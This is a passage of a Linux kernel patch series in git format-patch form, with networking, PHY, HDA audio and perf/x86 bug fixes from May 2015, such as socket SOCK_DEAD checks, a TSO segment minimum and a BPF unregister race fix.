Miller --- net/caif/caif_socket.c | 8 ++++++++ net/unix/af_unix.c | 8 ++++++++ 2 files changed, 16 insertions(+) diff --git a/net/caif/caif_socket.c b/net/caif/caif_socket.c index 4ec0c803aef1..112ad784838a 100644 --- a/net/caif/caif_socket.c +++ b/net/caif/caif_socket.c @@ -330,6 +330,10 @@ static long caif_stream_data_wait(struct sock *sk, long timeo) release_sock(sk); timeo = schedule_timeout(timeo); lock_sock(sk); + + if (sock_flag(sk, SOCK_DEAD)) + break; + clear_bit(SOCK_ASYNC_WAITDATA, &sk->sk_socket->flags); } @@ -373,6 +377,10 @@ static int caif_stream_recvmsg(struct socket *sock, struct msghdr *msg, struct sk_buff *skb; lock_sock(sk); + if (sock_flag(sk, SOCK_DEAD)) { + err = -ECONNRESET; + goto unlock; + } skb = skb_dequeue(&sk->sk_receive_queue); caif_check_flow_release(sk); diff --git a/net/unix/af_unix.c b/net/unix/af_unix.c index 5266ea7b922b..06430598cf51 100644 --- a/net/unix/af_unix.c +++ b/net/unix/af_unix.c @@ -1880,6 +1880,10 @@ static long unix_stream_data_wait(struct sock *sk, long timeo, unix_state_unlock(sk); timeo = freezable_schedule_timeout(timeo); unix_state_lock(sk); + + if (sock_flag(sk, SOCK_DEAD)) + break; + clear_bit(SOCK_ASYNC_WAITDATA, &sk->sk_socket->flags); } @@ -1939,6 +1943,10 @@ static int unix_stream_recvmsg(struct socket *sock, struct msghdr *msg, struct sk_buff *skb, *last; unix_state_lock(sk); + if (sock_flag(sk, SOCK_DEAD)) { + err = -ECONNRESET; + goto unlock; + } last = skb = skb_peek(&sk->sk_receive_queue); again: if (skb == NULL) { From d6a4e26afb80c049e7f94e1b7b506dcda61eee88 Mon Sep 17 00:00:00 2001 From: Eric Dumazet Date: Tue, 26 May 2015 08:55:28 -0700 Subject: [PATCH 274/872] tcp: tcp_tso_autosize() minimum is one packet By making sure sk->sk_gso_max_segs minimal value is one, and sysctl_tcp_min_tso_segs minimal value is one as well, tcp_tso_autosize() will return a non zero value. We can then revert 843925f33fcc293d80acf2c5c8a78adf3344d49b ("tcp: Do not apply TSO segment limit to non-TSO packets") and save few cpu cycles in fast path. Signed-off-by: Eric Dumazet Cc: Neal Cardwell Cc: Herbert Xu Acked-by: Neal Cardwell Acked-by: Herbert Xu Signed-off-by: David S. 
Miller --- net/core/sock.c | 5 ++++- net/ipv4/sysctl_net_ipv4.c | 2 +- net/ipv4/tcp_output.c | 4 ++-- 3 files changed, 7 insertions(+), 4 deletions(-) diff --git a/net/core/sock.c b/net/core/sock.c index 29124fcdc42a..e72633c346b1 100644 --- a/net/core/sock.c +++ b/net/core/sock.c @@ -1581,6 +1581,8 @@ EXPORT_SYMBOL_GPL(sk_clone_lock); void sk_setup_caps(struct sock *sk, struct dst_entry *dst) { + u32 max_segs = 1; + __sk_dst_set(sk, dst); sk->sk_route_caps = dst->dev->features; if (sk->sk_route_caps & NETIF_F_GSO) @@ -1592,9 +1594,10 @@ void sk_setup_caps(struct sock *sk, struct dst_entry *dst) } else { sk->sk_route_caps |= NETIF_F_SG | NETIF_F_HW_CSUM; sk->sk_gso_max_size = dst->dev->gso_max_size; - sk->sk_gso_max_segs = dst->dev->gso_max_segs; + max_segs = max_t(u32, dst->dev->gso_max_segs, 1); } } + sk->sk_gso_max_segs = max_segs; } EXPORT_SYMBOL_GPL(sk_setup_caps); diff --git a/net/ipv4/sysctl_net_ipv4.c b/net/ipv4/sysctl_net_ipv4.c index 841de32f1fee..e64892769607 100644 --- a/net/ipv4/sysctl_net_ipv4.c +++ b/net/ipv4/sysctl_net_ipv4.c @@ -702,7 +702,7 @@ static struct ctl_table ipv4_table[] = { .maxlen = sizeof(int), .mode = 0644, .proc_handler = proc_dointvec_minmax, - .extra1 = &zero, + .extra1 = &one, .extra2 = &gso_max_segs, }, { diff --git a/net/ipv4/tcp_output.c b/net/ipv4/tcp_output.c index 534e5fdb04c1..190538a2a88c 100644 --- a/net/ipv4/tcp_output.c +++ b/net/ipv4/tcp_output.c @@ -2088,7 +2088,7 @@ static bool tcp_write_xmit(struct sock *sk, unsigned int mss_now, int nonagle, if (unlikely(!tcp_snd_wnd_test(tp, skb, mss_now))) break; - if (tso_segs == 1 || !max_segs) { + if (tso_segs == 1) { if (unlikely(!tcp_nagle_test(tp, skb, mss_now, (tcp_skb_is_last(sk, skb) ? nonagle : TCP_NAGLE_PUSH)))) @@ -2101,7 +2101,7 @@ static bool tcp_write_xmit(struct sock *sk, unsigned int mss_now, int nonagle, } limit = mss_now; - if (tso_segs > 1 && max_segs && !tcp_urg_mode(tp)) + if (tso_segs > 1 && !tcp_urg_mode(tp)) limit = tcp_mss_split_point(sk, skb, mss_now, min_t(unsigned int, cwnd_quota, From ffa915d071ce4a05dcd866409df26513d25786f8 Mon Sep 17 00:00:00 2001 From: "David S. Miller" Date: Wed, 27 May 2015 00:19:03 -0400 Subject: [PATCH 275/872] ipv4: Fix fib_trie.c build, missing linux/vmalloc.h include. We used to get this indirectly I supposed, but no longer do. Either way, an explicit include should have been done in the first place. net/ipv4/fib_trie.c: In function '__node_free_rcu': >> net/ipv4/fib_trie.c:293:3: error: implicit declaration of function 'vfree' [-Werror=implicit-function-declaration] vfree(n); ^ net/ipv4/fib_trie.c: In function 'tnode_alloc': >> net/ipv4/fib_trie.c:312:3: error: implicit declaration of function 'vzalloc' [-Werror=implicit-function-declaration] return vzalloc(size); ^ >> net/ipv4/fib_trie.c:312:3: warning: return makes pointer from integer without a cast cc1: some warnings being treated as errors Reported-by: kbuild test robot Signed-off-by: David S. 
Miller --- net/ipv4/fib_trie.c | 1 + 1 file changed, 1 insertion(+) diff --git a/net/ipv4/fib_trie.c b/net/ipv4/fib_trie.c index 5a5d9bdeaeb4..01bce1506cd7 100644 --- a/net/ipv4/fib_trie.c +++ b/net/ipv4/fib_trie.c @@ -72,6 +72,7 @@ #include #include #include +#include #include #include #include From 082739aa458a74add9a2362988e5aca0367bfa53 Mon Sep 17 00:00:00 2001 From: Daniel Borkmann Date: Mon, 25 May 2015 14:08:03 +0200 Subject: [PATCH 276/872] tools: bpf_jit_disasm: fix segfault on disabled debugging log output With recent debugging, I noticed that bpf_jit_disasm segfaults when there's no debugging output from the JIT compiler to the kernel log. Reason is that when regexec(3) doesn't match on anything, start/end offsets are not being filled out and contain some uninitialized garbage from stack. Thus, we need zero out offsets first. Signed-off-by: Daniel Borkmann Signed-off-by: David S. Miller --- tools/net/bpf_jit_disasm.c | 2 ++ 1 file changed, 2 insertions(+) diff --git a/tools/net/bpf_jit_disasm.c b/tools/net/bpf_jit_disasm.c index c5baf9c591b7..618c2bcd4eab 100644 --- a/tools/net/bpf_jit_disasm.c +++ b/tools/net/bpf_jit_disasm.c @@ -123,6 +123,8 @@ static int get_last_jit_image(char *haystack, size_t hlen, assert(ret == 0); ptr = haystack; + memset(pmatch, 0, sizeof(pmatch)); + while (1) { ret = regexec(®ex, ptr, 1, pmatch, 0); if (ret == 0) { From 748a7295d7242bc1aaaec0e245cc61f2be754766 Mon Sep 17 00:00:00 2001 From: Vladimir Zapolskiy Date: Tue, 26 May 2015 03:50:04 +0300 Subject: [PATCH 277/872] net: netxen: correct sysfs bin attribute return code If read() syscall requests unexpected number of bytes from "dimm" binary attribute file, return EINVAL instead of EPERM. At the same time pin down sysfs file size to the fixed sizeof(struct netxen_dimm_cfg), which allows to exploit some missing sanity checks from kernfs (file boundary checks vs offset etc.) Signed-off-by: Vladimir Zapolskiy Signed-off-by: David S. Miller --- drivers/net/ethernet/qlogic/netxen/netxen_nic_main.c | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/drivers/net/ethernet/qlogic/netxen/netxen_nic_main.c b/drivers/net/ethernet/qlogic/netxen/netxen_nic_main.c index e0c31e3947d1..6409a06bbdf6 100644 --- a/drivers/net/ethernet/qlogic/netxen/netxen_nic_main.c +++ b/drivers/net/ethernet/qlogic/netxen/netxen_nic_main.c @@ -3025,9 +3025,9 @@ netxen_sysfs_read_dimm(struct file *filp, struct kobject *kobj, u8 dw, rows, cols, banks, ranks; u32 val; - if (size != sizeof(struct netxen_dimm_cfg)) { + if (size < attr->size) { netdev_err(netdev, "Invalid size\n"); - return -1; + return -EINVAL; } memset(&dimm, 0, sizeof(struct netxen_dimm_cfg)); @@ -3137,7 +3137,7 @@ netxen_sysfs_read_dimm(struct file *filp, struct kobject *kobj, static struct bin_attribute bin_attr_dimm = { .attr = { .name = "dimm", .mode = (S_IRUGO | S_IWUSR) }, - .size = 0, + .size = sizeof(struct netxen_dimm_cfg), .read = netxen_sysfs_read_dimm, }; From e463d88c36d42211aa72ed76d32fb8bf37820ef1 Mon Sep 17 00:00:00 2001 From: Florian Fainelli Date: Tue, 26 May 2015 12:19:58 -0700 Subject: [PATCH 278/872] net: phy: Add phy_interface_is_rgmii helper RGMII interfaces come in 4 different flavors that the PHY library needs to care about: regular RGMII (no delays), RGMII with either RX or TX delay, and both. In order to avoid errors of checking only for one type of RGMII interface and miss the 3 others, introduce a convenience function which tests for all values. Suggested-by: David S. 
Miller Signed-off-by: Florian Fainelli Signed-off-by: David S. Miller --- include/linux/phy.h | 11 +++++++++++ 1 file changed, 11 insertions(+) diff --git a/include/linux/phy.h b/include/linux/phy.h index 701c7a3946e0..a26c3f84b8dd 100644 --- a/include/linux/phy.h +++ b/include/linux/phy.h @@ -677,6 +677,17 @@ static inline bool phy_is_internal(struct phy_device *phydev) return phydev->is_internal; } +/** + * phy_interface_is_rgmii - Convenience function for testing if a PHY interface + * is RGMII (all variants) + * @phydev: the phy_device struct + */ +static inline bool phy_interface_is_rgmii(struct phy_device *phydev) +{ + return phydev->interface >= PHY_INTERFACE_MODE_RGMII && + phydev->interface <= PHY_INTERFACE_MODE_RGMII_TXID; +} + /** * phy_write_mmd - Convenience function for writing a register * on an MMD on a given PHY. From 32a641615a11f769a0c1092a47ce00ced9665e66 Mon Sep 17 00:00:00 2001 From: Florian Fainelli Date: Tue, 26 May 2015 12:19:59 -0700 Subject: [PATCH 279/872] net: phy: Utilize phy_interface_is_rgmii Update all open-coded tests for all 4 PHY_INTERFACE_MODE_RGMII* values to use the newly introduced helper: phy_interface_is_rgmii. Signed-off-by: Florian Fainelli Signed-off-by: David S. Miller --- drivers/net/phy/icplus.c | 5 +---- drivers/net/phy/marvell.c | 10 ++-------- drivers/net/phy/phy.c | 3 +-- 3 files changed, 4 insertions(+), 14 deletions(-) diff --git a/drivers/net/phy/icplus.c b/drivers/net/phy/icplus.c index 8644f039d922..0dbc445a5fa0 100644 --- a/drivers/net/phy/icplus.c +++ b/drivers/net/phy/icplus.c @@ -139,10 +139,7 @@ static int ip1001_config_init(struct phy_device *phydev) if (c < 0) return c; - if ((phydev->interface == PHY_INTERFACE_MODE_RGMII) || - (phydev->interface == PHY_INTERFACE_MODE_RGMII_ID) || - (phydev->interface == PHY_INTERFACE_MODE_RGMII_RXID) || - (phydev->interface == PHY_INTERFACE_MODE_RGMII_TXID)) { + if (phy_interface_is_rgmii(phydev)) { c = phy_read(phydev, IP10XX_SPEC_CTRL_STATUS); if (c < 0) diff --git a/drivers/net/phy/marvell.c b/drivers/net/phy/marvell.c index 1b1698f98818..f721444c2b0a 100644 --- a/drivers/net/phy/marvell.c +++ b/drivers/net/phy/marvell.c @@ -317,10 +317,7 @@ static int m88e1121_config_aneg(struct phy_device *phydev) if (err < 0) return err; - if ((phydev->interface == PHY_INTERFACE_MODE_RGMII) || - (phydev->interface == PHY_INTERFACE_MODE_RGMII_ID) || - (phydev->interface == PHY_INTERFACE_MODE_RGMII_RXID) || - (phydev->interface == PHY_INTERFACE_MODE_RGMII_TXID)) { + if (phy_interface_is_rgmii(phydev)) { mscr = phy_read(phydev, MII_88E1121_PHY_MSCR_REG) & MII_88E1121_PHY_MSCR_DELAY_MASK; @@ -469,10 +466,7 @@ static int m88e1111_config_init(struct phy_device *phydev) int err; int temp; - if ((phydev->interface == PHY_INTERFACE_MODE_RGMII) || - (phydev->interface == PHY_INTERFACE_MODE_RGMII_ID) || - (phydev->interface == PHY_INTERFACE_MODE_RGMII_RXID) || - (phydev->interface == PHY_INTERFACE_MODE_RGMII_TXID)) { + if (phy_interface_is_rgmii(phydev)) { temp = phy_read(phydev, MII_M1111_PHY_EXT_CR); if (temp < 0) diff --git a/drivers/net/phy/phy.c b/drivers/net/phy/phy.c index 377d2db04d33..b2197b506acb 100644 --- a/drivers/net/phy/phy.c +++ b/drivers/net/phy/phy.c @@ -1093,8 +1093,7 @@ int phy_init_eee(struct phy_device *phydev, bool clk_stop_enable) if ((phydev->duplex == DUPLEX_FULL) && ((phydev->interface == PHY_INTERFACE_MODE_MII) || (phydev->interface == PHY_INTERFACE_MODE_GMII) || - (phydev->interface >= PHY_INTERFACE_MODE_RGMII && - phydev->interface <= PHY_INTERFACE_MODE_RGMII_TXID) || + 
phy_interface_is_rgmii(phydev) || phy_is_internal(phydev))) { int eee_lp, eee_cap, eee_adv; u32 lp, cap, adv; From 49fb18972581a781658a4637de76e6069ed5964e Mon Sep 17 00:00:00 2001 From: Takashi Iwai Date: Wed, 27 May 2015 08:37:19 +0200 Subject: [PATCH 280/872] ALSA: hda - Set stream_pm ops automatically by generic parser This allows user to test power_save_node feature via sysfs or patch firmware even on the codecs that don't specify it. It'll also save a few lines. Signed-off-by: Takashi Iwai --- sound/pci/hda/hda_generic.c | 5 ++++- sound/pci/hda/patch_realtek.c | 1 - sound/pci/hda/patch_sigmatel.c | 1 - sound/pci/hda/patch_via.c | 1 - 4 files changed, 4 insertions(+), 4 deletions(-) diff --git a/sound/pci/hda/hda_generic.c b/sound/pci/hda/hda_generic.c index 1c8678775f40..ac0db1679f09 100644 --- a/sound/pci/hda/hda_generic.c +++ b/sound/pci/hda/hda_generic.c @@ -4926,9 +4926,12 @@ int snd_hda_gen_parse_auto_config(struct hda_codec *codec, dig_only: parse_digital(codec); - if (spec->power_down_unused || codec->power_save_node) + if (spec->power_down_unused || codec->power_save_node) { if (!codec->power_filter) codec->power_filter = snd_hda_gen_path_power_filter; + if (!codec->patch_ops.stream_pm) + codec->patch_ops.stream_pm = snd_hda_gen_stream_pm; + } if (!spec->no_analog && spec->beep_nid) { err = snd_hda_attach_beep_device(codec, spec->beep_nid); diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c index fc0ccc78bdc7..e3bf72bb278c 100644 --- a/sound/pci/hda/patch_realtek.c +++ b/sound/pci/hda/patch_realtek.c @@ -5724,7 +5724,6 @@ static int patch_alc269(struct hda_codec *codec) set_beep_amp(spec, spec->gen.mixer_nid, 0x04, HDA_INPUT); codec->patch_ops = alc_patch_ops; - codec->patch_ops.stream_pm = snd_hda_gen_stream_pm; #ifdef CONFIG_PM codec->patch_ops.suspend = alc269_suspend; codec->patch_ops.resume = alc269_resume; diff --git a/sound/pci/hda/patch_sigmatel.c b/sound/pci/hda/patch_sigmatel.c index 43c99ce4a520..0de0fd95144a 100644 --- a/sound/pci/hda/patch_sigmatel.c +++ b/sound/pci/hda/patch_sigmatel.c @@ -4403,7 +4403,6 @@ static const struct hda_codec_ops stac_patch_ops = { #ifdef CONFIG_PM .suspend = stac_suspend, #endif - .stream_pm = snd_hda_gen_stream_pm, .reboot_notify = stac_shutup, }; diff --git a/sound/pci/hda/patch_via.c b/sound/pci/hda/patch_via.c index 31a95cca015d..742087ef378f 100644 --- a/sound/pci/hda/patch_via.c +++ b/sound/pci/hda/patch_via.c @@ -472,7 +472,6 @@ static const struct hda_codec_ops via_patch_ops = { .init = via_init, .free = via_free, .unsol_event = snd_hda_jack_unsol_event, - .stream_pm = snd_hda_gen_stream_pm, #ifdef CONFIG_PM .suspend = via_suspend, .check_power_status = via_check_power_status, From dead9f29ddcc69551f35529a252d2704047870d3 Mon Sep 17 00:00:00 2001 From: Alexei Starovoitov Date: Fri, 15 May 2015 12:15:21 -0700 Subject: [PATCH 281/872] perf: Fix race in BPF program unregister there is a race between perf_event_free_bpf_prog() and free_trace_kprobe(): __free_event() event->destroy(event) tp_perf_event_destroy() perf_trace_destroy() perf_trace_event_unreg() which is dropping event->tp_event->perf_refcount and allows to proceed in: unregister_trace_kprobe() unregister_kprobe_event() trace_remove_event_call() probe_remove_event_call() free_trace_kprobe() while __free_event does: call_rcu(&event->rcu_head, free_event_rcu); free_event_rcu() perf_event_free_bpf_prog() To fix the race simply move perf_event_free_bpf_prog() before event->destroy(), since event->tp_event is still valid at that point. 
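The teardown-ordering rule behind that move can be shown in isolation. Below is a hedged, standalone C sketch (not kernel code; all structure and function names are invented) of why a resource that still needs a back-pointer must be released before the owner's destroy() callback invalidates that pointer.

#include <stdio.h>
#include <stdlib.h>

struct backend { int refcount; };

struct object {
	struct backend *backend;
	void (*destroy)(struct object *);
	void *attached;			/* dependent resource that references backend */
};

static void object_destroy(struct object *obj)
{
	/* after this point obj->backend must not be dereferenced */
	obj->backend->refcount--;
	obj->backend = NULL;
}

static void free_attached(struct object *obj)
{
	if (!obj->attached)
		return;
	/* needs a valid obj->backend to unaccount itself */
	printf("detaching while backend refcount=%d\n", obj->backend->refcount);
	free(obj->attached);
	obj->attached = NULL;
}

int main(void)
{
	struct backend be = { .refcount = 1 };
	struct object obj = {
		.backend  = &be,
		.destroy  = object_destroy,
		.attached = malloc(16),
	};

	/* correct order: dependent resource first, destroy callback second */
	free_attached(&obj);
	obj.destroy(&obj);
	return 0;
}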
Note, perf_trace_destroy() is not racing with trace_remove_event_call() since they both grab event_mutex. Reported-by: Wang Nan Signed-off-by: Alexei Starovoitov Signed-off-by: Peter Zijlstra (Intel) Cc: Arnaldo Carvalho de Melo Cc: Linus Torvalds Cc: Peter Zijlstra Cc: Thomas Gleixner Cc: lizefan@huawei.com Cc: pi3orama@163.com Fixes: 2541517c32be ("tracing, perf: Implement BPF programs attached to kprobes") Link: http://lkml.kernel.org/r/1431717321-28772-1-git-send-email-ast@plumgrid.com Signed-off-by: Ingo Molnar --- kernel/events/core.c | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/kernel/events/core.c b/kernel/events/core.c index 1a3bf48743ce..eddf1ed4155e 100644 --- a/kernel/events/core.c +++ b/kernel/events/core.c @@ -3442,7 +3442,6 @@ static void free_event_rcu(struct rcu_head *head) if (event->ns) put_pid_ns(event->ns); perf_event_free_filter(event); - perf_event_free_bpf_prog(event); kfree(event); } @@ -3573,6 +3572,8 @@ static void __free_event(struct perf_event *event) put_callchain_buffers(); } + perf_event_free_bpf_prog(event); + if (event->destroy) event->destroy(event); From b371b594317869971af326adcf7cd65cabdb4087 Mon Sep 17 00:00:00 2001 From: Peter Zijlstra Date: Thu, 21 May 2015 10:57:13 +0200 Subject: [PATCH 282/872] perf/x86: Fix event/group validation Commit 43b4578071c0 ("perf/x86: Reduce stack usage of x86_schedule_events()") violated the rule that 'fake' scheduling; as used for event/group validation; should not change the event state. This went mostly un-noticed because repeated calls of x86_pmu::get_event_constraints() would give the same result. And x86_pmu::put_event_constraints() would mostly not do anything. Commit e979121b1b15 ("perf/x86/intel: Implement cross-HT corruption bug workaround") made the situation much worse by actually setting the event->hw.constraint value to NULL, so when validation and actual scheduling interact we get NULL ptr derefs. Fix it by removing the constraint pointer from the event and move it back to an array, this time in cpuc instead of on the stack. validate_group() x86_schedule_events() event->hw.constraint = c; # store perf_task_event_sched_in() ... x86_schedule_events(); event->hw.constraint = c2; # store ... put_event_constraints(event); # assume failure to schedule intel_put_event_constraints() event->hw.constraint = NULL; c = event->hw.constraint; # read -> NULL if (!test_bit(hwc->idx, c->idxmsk)) # <- *BOOM* NULL deref This in particular is possible when the event in question is a cpu-wide event and group-leader, where the validate_group() tries to add an event to the group. 
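The hazard is easier to see reduced to its shape. The sketch below is standalone, illustrative C (not kernel code; all structure and function names are invented): scratch scheduling state kept in the shared event object can be clobbered by a concurrent validation pass, while scratch kept in each caller's own context cannot.

#include <stddef.h>
#include <stdio.h>

struct constraint { unsigned long idxmsk; };

struct event {
	/* shared scratch slot -- the problematic pattern */
	struct constraint *constraint;
};

struct sched_ctx {
	/* per-context scratch -- the pattern the fix moves to */
	struct constraint *scratch[4];
};

static struct constraint gp = { .idxmsk = 0xf };

/* buggy: scheduler state lives in the shared event */
static void schedule_shared(struct event *e, int fake)
{
	e->constraint = &gp;
	/* ... counter assignment would read e->constraint here ... */
	if (fake)
		e->constraint = NULL;	/* validation clean-up clobbers it */
}

/* fixed: state lives in the caller's own context */
static void schedule_private(struct sched_ctx *ctx, int idx)
{
	ctx->scratch[idx] = &gp;
	/* ... counter assignment reads ctx->scratch[idx] ... */
}

int main(void)
{
	struct event e = { 0 };
	struct sched_ctx real = { { 0 } }, fake = { { 0 } };

	schedule_shared(&e, 0);		/* real scheduling in progress */
	schedule_shared(&e, 1);		/* concurrent validation pass */
	printf("shared slot after validation: %p\n", (void *)e.constraint);

	schedule_private(&real, 0);	/* per-context scratch is untouched */
	schedule_private(&fake, 0);
	printf("real ctx slot: %p\n", (void *)real.scratch[0]);
	return 0;
}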
Reported-by: Vince Weaver Signed-off-by: Peter Zijlstra (Intel) Cc: Andrew Hunter Cc: Linus Torvalds Cc: Maria Dimakopoulou Cc: Peter Zijlstra Cc: Thomas Gleixner Fixes: 43b4578071c0 ("perf/x86: Reduce stack usage of x86_schedule_events()") Fixes: e979121b1b15 ("perf/x86/intel: Implement cross-HT corruption bug workaround") Signed-off-by: Ingo Molnar --- arch/x86/kernel/cpu/perf_event.c | 33 ++++++++++--------- arch/x86/kernel/cpu/perf_event.h | 9 ++--- arch/x86/kernel/cpu/perf_event_intel.c | 15 +++------ arch/x86/kernel/cpu/perf_event_intel_ds.c | 4 +-- arch/x86/kernel/cpu/perf_event_intel_uncore.c | 7 ++-- arch/x86/kernel/cpu/perf_event_intel_uncore.h | 1 + include/linux/perf_event.h | 4 --- 7 files changed, 33 insertions(+), 40 deletions(-) diff --git a/arch/x86/kernel/cpu/perf_event.c b/arch/x86/kernel/cpu/perf_event.c index 87848ebe2bb7..1664eeea65e0 100644 --- a/arch/x86/kernel/cpu/perf_event.c +++ b/arch/x86/kernel/cpu/perf_event.c @@ -620,7 +620,7 @@ struct sched_state { struct perf_sched { int max_weight; int max_events; - struct perf_event **events; + struct event_constraint **constraints; struct sched_state state; int saved_states; struct sched_state saved[SCHED_STATES_MAX]; @@ -629,7 +629,7 @@ struct perf_sched { /* * Initialize interator that runs through all events and counters. */ -static void perf_sched_init(struct perf_sched *sched, struct perf_event **events, +static void perf_sched_init(struct perf_sched *sched, struct event_constraint **constraints, int num, int wmin, int wmax) { int idx; @@ -637,10 +637,10 @@ static void perf_sched_init(struct perf_sched *sched, struct perf_event **events memset(sched, 0, sizeof(*sched)); sched->max_events = num; sched->max_weight = wmax; - sched->events = events; + sched->constraints = constraints; for (idx = 0; idx < num; idx++) { - if (events[idx]->hw.constraint->weight == wmin) + if (constraints[idx]->weight == wmin) break; } @@ -687,7 +687,7 @@ static bool __perf_sched_find_counter(struct perf_sched *sched) if (sched->state.event >= sched->max_events) return false; - c = sched->events[sched->state.event]->hw.constraint; + c = sched->constraints[sched->state.event]; /* Prefer fixed purpose counters */ if (c->idxmsk64 & (~0ULL << INTEL_PMC_IDX_FIXED)) { idx = INTEL_PMC_IDX_FIXED; @@ -745,7 +745,7 @@ static bool perf_sched_next_event(struct perf_sched *sched) if (sched->state.weight > sched->max_weight) return false; } - c = sched->events[sched->state.event]->hw.constraint; + c = sched->constraints[sched->state.event]; } while (c->weight != sched->state.weight); sched->state.counter = 0; /* start with first counter */ @@ -756,12 +756,12 @@ static bool perf_sched_next_event(struct perf_sched *sched) /* * Assign a counter for each event. 
*/ -int perf_assign_events(struct perf_event **events, int n, +int perf_assign_events(struct event_constraint **constraints, int n, int wmin, int wmax, int *assign) { struct perf_sched sched; - perf_sched_init(&sched, events, n, wmin, wmax); + perf_sched_init(&sched, constraints, n, wmin, wmax); do { if (!perf_sched_find_counter(&sched)) @@ -788,9 +788,9 @@ int x86_schedule_events(struct cpu_hw_events *cpuc, int n, int *assign) x86_pmu.start_scheduling(cpuc); for (i = 0, wmin = X86_PMC_IDX_MAX, wmax = 0; i < n; i++) { - hwc = &cpuc->event_list[i]->hw; + cpuc->event_constraint[i] = NULL; c = x86_pmu.get_event_constraints(cpuc, i, cpuc->event_list[i]); - hwc->constraint = c; + cpuc->event_constraint[i] = c; wmin = min(wmin, c->weight); wmax = max(wmax, c->weight); @@ -801,7 +801,7 @@ int x86_schedule_events(struct cpu_hw_events *cpuc, int n, int *assign) */ for (i = 0; i < n; i++) { hwc = &cpuc->event_list[i]->hw; - c = hwc->constraint; + c = cpuc->event_constraint[i]; /* never assigned */ if (hwc->idx == -1) @@ -821,9 +821,10 @@ int x86_schedule_events(struct cpu_hw_events *cpuc, int n, int *assign) } /* slow path */ - if (i != n) - unsched = perf_assign_events(cpuc->event_list, n, wmin, + if (i != n) { + unsched = perf_assign_events(cpuc->event_constraint, n, wmin, wmax, assign); + } /* * In case of success (unsched = 0), mark events as committed, @@ -840,7 +841,7 @@ int x86_schedule_events(struct cpu_hw_events *cpuc, int n, int *assign) e = cpuc->event_list[i]; e->hw.flags |= PERF_X86_EVENT_COMMITTED; if (x86_pmu.commit_scheduling) - x86_pmu.commit_scheduling(cpuc, e, assign[i]); + x86_pmu.commit_scheduling(cpuc, i, assign[i]); } } @@ -1292,8 +1293,10 @@ static void x86_pmu_del(struct perf_event *event, int flags) x86_pmu.put_event_constraints(cpuc, event); /* Delete the array entry. 
*/ - while (++i < cpuc->n_events) + while (++i < cpuc->n_events) { cpuc->event_list[i-1] = cpuc->event_list[i]; + cpuc->event_constraint[i-1] = cpuc->event_constraint[i]; + } --cpuc->n_events; perf_event_update_userpage(event); diff --git a/arch/x86/kernel/cpu/perf_event.h b/arch/x86/kernel/cpu/perf_event.h index 6ac5cb7a9e14..fdfaab7c5e55 100644 --- a/arch/x86/kernel/cpu/perf_event.h +++ b/arch/x86/kernel/cpu/perf_event.h @@ -172,7 +172,10 @@ struct cpu_hw_events { added in the current transaction */ int assign[X86_PMC_IDX_MAX]; /* event to counter assignment */ u64 tags[X86_PMC_IDX_MAX]; + struct perf_event *event_list[X86_PMC_IDX_MAX]; /* in enabled order */ + struct event_constraint *event_constraint[X86_PMC_IDX_MAX]; + unsigned int group_flag; int is_fake; @@ -519,9 +522,7 @@ struct x86_pmu { void (*put_event_constraints)(struct cpu_hw_events *cpuc, struct perf_event *event); - void (*commit_scheduling)(struct cpu_hw_events *cpuc, - struct perf_event *event, - int cntr); + void (*commit_scheduling)(struct cpu_hw_events *cpuc, int idx, int cntr); void (*start_scheduling)(struct cpu_hw_events *cpuc); @@ -717,7 +718,7 @@ static inline void __x86_pmu_enable_event(struct hw_perf_event *hwc, void x86_pmu_enable_all(int added); -int perf_assign_events(struct perf_event **events, int n, +int perf_assign_events(struct event_constraint **constraints, int n, int wmin, int wmax, int *assign); int x86_schedule_events(struct cpu_hw_events *cpuc, int n, int *assign); diff --git a/arch/x86/kernel/cpu/perf_event_intel.c b/arch/x86/kernel/cpu/perf_event_intel.c index 3998131d1a68..7a58fb5df15c 100644 --- a/arch/x86/kernel/cpu/perf_event_intel.c +++ b/arch/x86/kernel/cpu/perf_event_intel.c @@ -2106,7 +2106,7 @@ static struct event_constraint * intel_get_event_constraints(struct cpu_hw_events *cpuc, int idx, struct perf_event *event) { - struct event_constraint *c1 = event->hw.constraint; + struct event_constraint *c1 = cpuc->event_constraint[idx]; struct event_constraint *c2; /* @@ -2188,8 +2188,6 @@ intel_put_shared_regs_event_constraints(struct cpu_hw_events *cpuc, static void intel_put_event_constraints(struct cpu_hw_events *cpuc, struct perf_event *event) { - struct event_constraint *c = event->hw.constraint; - intel_put_shared_regs_event_constraints(cpuc, event); /* @@ -2197,19 +2195,14 @@ static void intel_put_event_constraints(struct cpu_hw_events *cpuc, * all events are subject to and must call the * put_excl_constraints() routine */ - if (c && cpuc->excl_cntrs) + if (cpuc->excl_cntrs) intel_put_excl_constraints(cpuc, event); - - /* cleanup dynamic constraint */ - if (c && (c->flags & PERF_X86_EVENT_DYNAMIC)) - event->hw.constraint = NULL; } -static void intel_commit_scheduling(struct cpu_hw_events *cpuc, - struct perf_event *event, int cntr) +static void intel_commit_scheduling(struct cpu_hw_events *cpuc, int idx, int cntr) { struct intel_excl_cntrs *excl_cntrs = cpuc->excl_cntrs; - struct event_constraint *c = event->hw.constraint; + struct event_constraint *c = cpuc->event_constraint[idx]; struct intel_excl_states *xlo, *xl; int tid = cpuc->excl_thread_id; int o_tid = 1 - tid; diff --git a/arch/x86/kernel/cpu/perf_event_intel_ds.c b/arch/x86/kernel/cpu/perf_event_intel_ds.c index 813f75d71175..7f73b3553e2e 100644 --- a/arch/x86/kernel/cpu/perf_event_intel_ds.c +++ b/arch/x86/kernel/cpu/perf_event_intel_ds.c @@ -706,9 +706,9 @@ void intel_pmu_pebs_disable(struct perf_event *event) cpuc->pebs_enabled &= ~(1ULL << hwc->idx); - if (event->hw.constraint->flags & PERF_X86_EVENT_PEBS_LDLAT) + if 
